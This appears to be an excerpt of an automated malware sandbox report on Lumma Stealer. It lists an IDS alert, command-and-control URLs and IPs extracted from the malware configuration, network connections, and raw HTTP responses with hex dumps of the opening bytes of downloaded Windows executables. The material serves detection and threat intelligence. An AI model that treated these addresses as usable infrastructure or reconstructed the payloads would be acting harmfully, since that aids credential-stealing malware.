Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:53053 -> 172.67.146.35:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.100/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199768374681
Source: Malware configuration extractor	URLs: https://t.me/edm0d
Source: Malware configuration extractor	URLs: 147.45.47.36:30035

Source: global traffic	TCP traffic: 192.168.2.6:53029 -> 147.45.47.36:30035
Source: global traffic	TCP traffic: 192.168.2.6:53031 -> 77.105.164.24:50505

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:06 GMTContent-Type: application/octet-streamContent-Length: 290344Last-Modified: Tue, 03 Sep 2024 12:56:21 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70775-46e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 04 00 00 0a 00 00 00 00 00 00 7e 5a 04 00 00 20 00 00 00 60 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 31 48 04 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 5a 04 00 57 00 00 00 00 60 04 00 02 06 00 00 00 00 00 00 00 00 00 00 00 48 04 00 28 26 00 00 00 80 04 00 0c 00 00 00 ec 58 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 3a 04 00 00 20 00 00 00 3c 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 60 04 00 00 08 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 46 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5a 04 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 4c 04 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 5e 33 ca c7 5d b6 b8 aa c0 42 cb c3 33 0b b3 48 31 5e 98 60 61 56 0f 92 6a 82 28 58 df 07 60 f0 92 b4 76 4b 29 da f1 67 41 d3 57 ca 7f a1 a3 7d 2a 3c 88 9e 3c 4c e6 d1 87 f5 fd 80 b0 81 8c 25 ae fc 7d 78 0a 33 31 d8 74 bd 72 a0 3a cb a3 5d e1 8d fd 10 61 23 0e c6 21 b6 55 ef 9c cd 96 71 b7 e9 16 96 31 7e d9 bb 80 40 8a 9a 87 91 0f 58 92 28 9b e6 bb de e1 f4 f5 4c 6a f0 f2 94 44 dc c0 c3 b0 0f 41 fd 1c 92 ee cf d3 44 d2 77 a3 6b 01 73 c5 09 8b 45 26 fe 00 c7 4c 3a ec f1 9d f3 b2 fe 90 c8 69 f6 9b 9f c0 41 44 ae 6c ec ad 1d 3b c6 c8 38 cc be 56 e5 e2 9e 0f c1 50 ef 56 5a 6f ee 24 fa 7e 82 e4 3a 17 8b e1 0f 6b 90 1e 1f 9b b9 69 82 01 84 e1 aa 09 f6 a3 68 6f ae b9 93 81 0a a0 9d b1 6c 62 14 44 42 0e 4f 8d 0d 49 a4 76 a4 4b 73 22 04 5b e2 49 4f fa d0 58 ea 32 24 71 05 0e c8 0d 8b b2 ea 33 f4 a4 66 84 0d 16 12 a5 0f b9 8a 61 f9 c7 58 9e 3b d8 a9 ba 28 d5 e4 38 66 8d f1 6a 15 23 b6 6b d3 d7 67 e3 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:06 GMTContent-Type: application/octet-streamContent-Length: 528896Last-Modified: Mon, 02 Sep 2024 09:53:28 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d58b18-81200"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a9 81 d5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 08 00 00 08 00 00 00 00 00 00 ce 27 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 27 08 00 57 00 00 00 00 40 08 00 d8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 3c 26 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 07 08 00 00 20 00 00 00 08 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 05 00 00 00 40 08 00 00 06 00 00 00 0a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 27 08 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 18 08 00 6c 0d 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 66 8c 88 3b 90 4a 4a d4 73 7d fa 2f cd ea da 31 de 6c b7 32 45 c9 ba 03 61 84 88 b8 e4 01 7d d4 70 79 aa 9b 78 7a 5a f4 40 6c bf b3 96 e0 7b 43 a2 24 99 74 bb c2 1f d7 39 73 4b 1f a5 85 c0 93 9d 0c 7f 6e 0c 00 8f 7e b8 0a f1 4d 5b 50 fb bd ad 54 42 4e 69 b9 23 19 7d d1 6a fd 7d 80 53 40 6b 72 db 23 e3 84 ae f3 b4 a0 47 96 42 f8 5e c7 8e f8 03 a9 fa 09 d4 7d 81 88 b8 10 c9 a6 16 54 31 86 a8 23 a1 b7 27 a1 05 63 51 62 36 d5 82 0c 6b 3b e7 31 a9 f7 5e 7f 26 84 44 8b 3b 11 c4 a5 9d 05 6b 58 53 0c 78 1c 4e 54 45 da 28 2f a6 68 00 b8 9b db c7 31 05 b6 32 2b 35 92 ef 50 76 b8 e7 0c 40 d3 d0 04 f8 c2 2f 3d bb b3 3f 51 9c 06 2c 0f 04 94 98 18 76 37 70 e6 ac f8 e6 b0 23 64 8f b5 9d 11 61 9b a4 38 c1 79 c5 87 10 fa 93 84 1e af 6d eb 7e 43 73 19 bd bc 4e 31 79 87 fe 03 30 df 69 91 d2 2e 39 0f 9b 89 45 95 c9 15 3e 56 ee 51 97 a8 12 96 0c d6 5a ba 3f 4d 5c 7f e2 32 5d 37 01 2a c2 8d 29 5a 22 db 8c 60 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 3851776Last-Modified: Mon, 02 Sep 2024 11:18:17 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d59ef9-3ac600"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 15 38 33 9d 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 e0 29 00 00 e2 10 00 00 00 00 00 9e ff 29 00 00 20 00 00 00 00 2a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 ff 29 00 4b 00 00 00 00 20 2a 00 08 dd 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 0c 00 00 00 02 ff 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 df 29 00 00 20 00 00 00 e0 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 00 2a 00 00 02 00 00 00 e4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 dd 10 00 00 20 2a 00 00 de 10 00 00 e6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 3b 00 00 02 00 00 00 c4 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 210984Last-Modified: Tue, 03 Sep 2024 12:56:19 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70773-33828"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 06 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 06 03 00 00 0a 00 00 00 00 00 00 7e 24 03 00 00 20 00 00 00 40 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 03 00 00 02 00 00 53 30 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 24 03 00 57 00 00 00 00 40 03 00 02 06 00 00 00 00 00 00 00 00 00 00 00 12 03 00 28 26 00 00 00 60 03 00 0c 00 00 00 ec 22 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 04 03 00 00 20 00 00 00 06 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 03 00 00 08 00 00 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 03 00 00 02 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 24 03 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 16 03 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c9 1c 4d 4c b3 55 fa 96 5f cb 26 d0 44 d4 8c 06 58 35 71 b8 cf f8 95 cb 17 80 f5 4d 2d b0 4e 34 d9 f4 68 42 4b 2b 64 e9 36 30 82 d5 10 54 0f bf 53 f1 9a d0 d2 54 58 71 f4 53 f7 8c 43 61 7d fa ba 26 c7 69 41 e3 a8 9b d8 08 05 5b 37 1b d6 97 fd 8b da e3 46 b3 d7 ce e9 cb f1 03 c2 6d 91 06 f3 4b dc 53 6c 80 b4 89 d1 29 49 7d 5b 88 03 39 d7 97 52 9a bc be dd 89 e6 7a f2 ce 32 b2 28 8e e9 43 5a b2 60 3e ef d8 da fd f5 cb c0 61 aa 46 52 bb 31 d3 8a f6 24 08 b9 f9 15 09 54 00 ce 40 53 6d 33 b1 b9 49 1d 71 fe 50 44 32 37 3e 53 63 20 5b 48 cc 4f f8 31 bd 8e 4a 7b e0 e9 89 8e f0 bb 33 b2 80 fa 68 82 07 d9 98 0f 12 0c 0c 4b 87 78 28 9e e8 3c 4f 5c bc 8f b6 e6 bf 73 6f 83 fe 72 f9 06 41 34 7d ff d5 a2 2a 29 77 e1 d5 29 d9 1b 6c 45 a9 f9 ad 31 11 28 f2 3f ba 96 00 b3 52 41 13 ff 87 d1 8d b3 d9 b8 45 57 61 60 0b 82 c9 6c aa 8d ec e3 8f 0a a0 3b 26 36 88 a0 a6 98 13 32 2a 53 fa 01 57 d1 e0 6c 06 29 42 3b 5d 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:07 GMTContent-Type: application/octet-streamContent-Length: 320512Last-Modified: Tue, 03 Sep 2024 15:40:40 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d72df8-4e400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 20 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 0a 00 00 00 00 00 00 7e f6 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 18 6c 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 f6 04 00 57 00 00 00 00 00 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 ec f4 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 d6 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 00 05 00 00 08 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f6 04 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 e8 04 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c a5 fc 99 15 70 60 b9 3d 28 fe 0b 42 aa 31 87 04 ea 9a c6 e8 ac f8 56 ab 41 95 4c 66 1b b3 a4 dd d4 d2 70 45 3f 9e 05 27 a2 76 fb 6b 7a 97 47 2f 4f 4c f3 9c dd da 2a f9 38 4f 4f b7 35 d2 a5 30 52 53 1f d0 98 fd 70 0b f8 4a 8e f1 d4 cc 24 ff 92 6e 7c d6 db 5e ba b8 76 b9 19 7c 7d 8f 54 91 5b 63 72 24 6b 41 77 07 fa 91 f3 6b 7c 0e 6c 50 32 09 c6 09 bd db 86 aa a1 88 af d6 f8 55 b8 36 66 24 ea 9a 6f ea 6b 05 1c 08 9c 49 4d e3 ff f2 b3 e5 0b ac 00 ad 4a f6 be e7 f2 14 d5 30 31 7f c4 1a e5 7e 1a 17 a3 89 ea 68 7e ff 16 fb 8d d3 59 bf c0 ae 8a 72 87 3a 2f c3 93 be c0 17 5b 30 91 04 63 ff af 41 a4 5d 93 f9 88 9a 63 45 0b 7a 34 d7 17 a6 97 52 47 a0 47 cd f4 94 e3 da 7c a0 28 45 59 4a e3 65 ab 7e 89 e2 f8 68 18 b2 ce 58 05 d8 cb 76 8e 8f 25 f8 1c 36 ee 7f 9c 7d e2 f8 fa 9a 4f fc 7d 8c 3c 3a 1f f2 1a ae b8 4c 17 41 1b 60 95 63 b4 8c 33 ff 9d 8e 21 02 91 5d 0b 2f 00 7d 70 b1 1b a9 38 90 80 ba 40 4c 42 a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:08 GMTContent-Type: application/octet-streamContent-Length: 14748160Last-Modified: Fri, 30 Aug 2024 12:15:51 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d1b7f7-e10a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 34 de 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 88 60 00 00 e6 0a 00 00 00 00 00 10 7c 07 00 00 10 00 00 00 40 d1 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 c0 e4 00 00 04 00 00 56 55 e1 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 dc 00 4c 04 00 00 00 e0 e1 00 95 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 00 5c fa 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 56 d1 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 86 60 00 00 10 00 00 00 88 60 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c 93 70 00 00 a0 60 00 00 94 70 00 00 8c 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 77 0b 00 00 40 d1 00 00 12 08 00 00 20 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 4c 04 00 00 00 c0 dc 00 00 06 00 00 00 32 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c fa 04 00 00 d0 dc 00 00 fc 04 00 00 38 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 d0 e1 00 00 02 00 00 00 34 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 95 d2 02 00 00 e0 e1 00 00 d4 02 00 00 36 de 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:10 GMTContent-Type: application/octet-streamContent-Length: 8684256Last-Modified: Tue, 03 Sep 2024 13:26:30 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d70e86-8482e0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a8 b8 50 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 08 80 00 00 9e 03 00 00 00 00 00 ce 26 80 00 00 20 00 00 00 40 80 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 84 00 00 04 00 00 49 b2 84 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 26 80 00 4b 00 00 00 00 60 80 00 d6 97 03 00 00 00 00 00 00 00 00 00 00 aa 83 00 e0 d8 00 00 00 00 84 00 0c 00 00 00 36 26 80 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 06 80 00 00 20 00 00 00 08 80 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 a0 02 00 00 00 40 80 00 00 04 00 00 00 0c 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d6 97 03 00 00 60 80 00 00 98 03 00 00 10 80 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 84 00 00 02 00 00 00 a8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 